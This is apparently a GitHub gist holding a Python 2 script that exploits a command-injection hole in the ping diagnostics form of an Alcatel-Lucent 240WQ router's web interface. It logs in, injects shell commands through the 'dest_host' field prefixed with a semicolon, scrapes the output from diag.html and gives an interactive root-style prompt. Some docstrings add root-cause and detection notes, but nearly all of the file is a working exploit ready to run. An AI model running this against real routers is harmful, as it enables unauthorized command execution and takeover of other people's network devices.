
@epadillas
Last active August 29, 2015 14:05
Alcatel-Lucent 240WQ router shell
#!/usr/bin/python
"""
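Execute commands on the router by exploiting a command-injection vulnerability
in the ping diagnostics form of its web interface: the script logs in, then
submits the command in the form's `dest_host` field.
Set your credentials in the `conf` variable.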
"""
import requests
import sys
# Settings read by every request helper in this script.
conf = {
    # Account for the router's web admin login form.
    'username': 'TELMEX',
    # Placeholder to be replaced by the reader. NOTE(review): the hint implies
    # the admin password equals the Wi-Fi (WPA) passphrase; if so, anyone who
    # knows the Wi-Fi key can also sign in to the admin UI -- confirm on the
    # device and set a distinct admin password.
    'password': '<your WPA password>',
    # LAN address of the router's web interface.
    'router': '192.168.1.254',
}
def read_user_cmd():
    """Prompt for lines forever and forward each one to the router.

    ``exit`` ends the process with status 0. An empty line first prints the
    stored result via get_cmd_output(); control then falls through, so
    send_cmd() is still called with the empty string.

    Python 2 only: relies on ``raw_input``.
    """
    # The 'root@' prefix is cosmetic; nothing in this script checks which
    # account the device runs the submitted text as.
    prompt = 'root@' + conf['router'] + ':~$ '
    while True:
        line = raw_input(prompt)
        if line == 'exit':
            sys.exit(0)
        if line == '':
            get_cmd_output()
        send_cmd(line)
def login():
    """POST the configured credentials to the router's login form.

    The request goes through the module-level session ``s``, so any cookies
    the device sets are carried by the later requests. The response is
    returned, but the only visible caller (the ``__main__`` block) ignores
    it, so a rejected login is not detected there.
    """
    # Plain HTTP: the admin username and password cross the LAN unencrypted.
    url = 'http://' + conf['router'] + '/GponForm/LoginForm'
    credentials = {
        'username': conf['username'],
        'password': conf['password'],
    }
    return s.post(url, credentials)
def send_cmd(cmd):
    """Submit *cmd* through the ping action of the diagnostics form.

    The text is posted as the ``dest_host`` field, prefixed with ``;``.
    Returns the response of the POST; the output itself is read separately
    by get_cmd_output().

    Root cause (device side, inferred from this request shape): the firmware
    presumably places ``dest_host`` on a shell command line without
    validating it. A fixed firmware would accept only a hostname or IP
    literal in this field and start ping without going through a shell.

    Detection: a POST to /GponForm/diag_XForm whose ``dest_host`` contains
    shell metacharacters is not a legitimate ping target and is worth
    alerting on; keeping the admin interface unreachable from untrusted
    networks limits who can send it.
    """
    url = 'http://' + conf['router'] + '/GponForm/diag_XForm'
    form_fields = {
        'XWebPageName': 'diag',
        'diag_action': 'ping',
        'wan_conlist': '0',
        # Where the field value stops being a host name.
        'dest_host': ';' + cmd,
        'pinglength': '64',
        'pingcount': '4',
    }
    return s.post(url, form_fields)
def get_cmd_output():
    """Fetch /diag.html and print the diagnostic result embedded in it.

    The text between ``diag_result = "`` and ``No traceroute test`` is
    extracted with find_between() (an empty string when a marker is
    missing) and its backslash escapes are decoded before printing.

    Python 2 only: the ``string_escape`` codec does not exist in Python 3.
    """
    page_url = 'http://' + conf['router'] + '/diag.html'
    response = s.get(page_url)
    # NOTE(review): diag_result looks like a script variable in the page that
    # holds the last diagnostic output -- inferred from the marker text.
    raw = find_between(response.text, 'diag_result = "', 'No traceroute test')
    print(raw.decode('string_escape'))
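def find_between(s, first, last):
    """Return the part of *s* between the markers *first* and *last*.

    The search for *last* starts after the end of *first*, so an occurrence
    of *last* that precedes *first* is ignored. Returns an empty string when
    either marker cannot be found.
    """
    try:
        # Only the two lookups can raise; keep the try body to them.
        start = s.index(first) + len(first)
        end = s.index(last, start)
    except ValueError:
        return ""
    return s[start:end]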
if __name__ == '__main__':
    # ``s`` becomes a module-level name here; login(), send_cmd() and
    # get_cmd_output() all send their requests through this one session.
    s = requests.session()
    # The login response is discarded, so the prompt starts even if the
    # router rejected the credentials.
    login()
    read_user_cmd()